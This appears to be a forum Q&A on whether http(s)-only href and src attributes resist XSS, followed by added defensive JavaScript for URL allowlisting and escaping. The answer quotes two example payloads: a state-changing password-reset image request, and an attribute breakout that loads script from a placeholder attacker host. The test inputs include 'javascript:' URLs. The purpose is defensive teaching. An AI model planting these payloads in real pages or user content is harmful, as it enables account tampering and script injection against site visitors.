Is this safe?
I wonder if href and src attributes on <a> and <img> tags are always safe w.r.t. XSS attacks, if they start with http:// or https://.
For example, is it possible to append javascript: ... to the href and src attribute in some manner, to execute code?
Disregarding whether or not the destination page is e.g. a phishing site, or the <img src=...> triggers a terribly troublesome HTTP GET request.
Background: I'm processing text with markdown, and then I sanitize the resulting HTML (using Google Caja's JsHtmlSanitizer). Some sample code in Google Caja assumes all hrefs and srcs that start with http:// or https:// are safe -- I wonder if it's safe to use that sample code.
Kind regards,
Kaj-Magnus
Allowing only the http(s) protocol prevents running javascript, but they can still be used for malicious purposes. Consider the following:
<img src="http://your.website.com/changepassword.php?newpass=hacked123" />
Allowing users to embed content from external websites is always risky, but sometimes inevitable. Making sure your scripts are well protected against XSS like the one above will make your site more solid, if not 100% hacker proof.
EDIT: Here's a pretty comprehensive XSS cheat sheet, though a bit aged. One important point taken from the cheat sheet that I forgot to mention is that you should also escape quotes and/or > signs to prevent URLs such as legiturl.com ><script src="http://mal.icio.us/attack.js">.
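The two points raised in this thread (allow only http/https as the scheme, and escape quotes and `>` so the value cannot break out of the attribute) as a small worked example. This is added code, not from the question, the answer, or Google Caja; it assumes Node.js, where the WHATWG `URL` class is global, and uses no external packages. The `allowedHosts` parameter on `renderImage` is an assumption of this example, a way to limit the GET requests an embedded image can trigger to hosts you control.

```javascript
// Added example, not code from the original thread or from Google Caja.
// Assumes Node.js (the WHATWG URL class is global); no external packages.

const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Parse the attribute value as an absolute URL and accept it only if the
// scheme is on the allowlist. Parsing (rather than a startsWith check)
// lowercases the scheme and strips the leading whitespace and embedded
// tabs/newlines that browsers ignore, so values such as "JAVASCRIPT:..." or
// "java\nscript:..." are rejected as well. Returns the normalised URL, or
// null when the value must be dropped.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value)); // throws on relative or malformed input
  } catch (err) {
    return null;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Escape for HTML text and for double-quoted attribute values. Encoding
// the quote and the angle brackets is what stops a value like
// `legiturl.com "><script src=...>` from closing the attribute and the tag.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build an <a> tag from an untrusted href and link text. Returns null when
// the href is not acceptable so the caller can drop or replace the link.
function renderLink(href, text) {
  const url = safeUrl(href);
  if (url === null) return null;
  return `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
}

// Same for <img>. Any http(s) src still makes the viewer's browser issue a
// GET to a site of the author's choosing, so an optional host allowlist
// (hypothetical parameter, e.g. your own image proxy) limits where that
// request can go.
function renderImage(src, alt, allowedHosts = null) {
  const url = safeUrl(src);
  if (url === null) return null;
  if (allowedHosts && !allowedHosts.has(new URL(url).hostname)) return null;
  return `<img src="${escapeHtml(url)}" alt="${escapeHtml(alt)}">`;
}

// Constructed sample inputs; run with `node file.js` to see which survive.
const SAMPLES = [
  'http://example.com/page',
  'HTTPS://Example.com/img.png',
  'javascript:alert(1)',
  'java\nscript:alert(1)',
  '/local/path',
];
for (const v of SAMPLES) {
  console.log(JSON.stringify(v), '->', safeUrl(v));
}
```

The scheme check only decides whether the browser could execute script from the URL; the `changepassword.php?newpass=...` image in the answer above still passes it, because that problem lives on the server that changes state on a GET, not in the sanitizer.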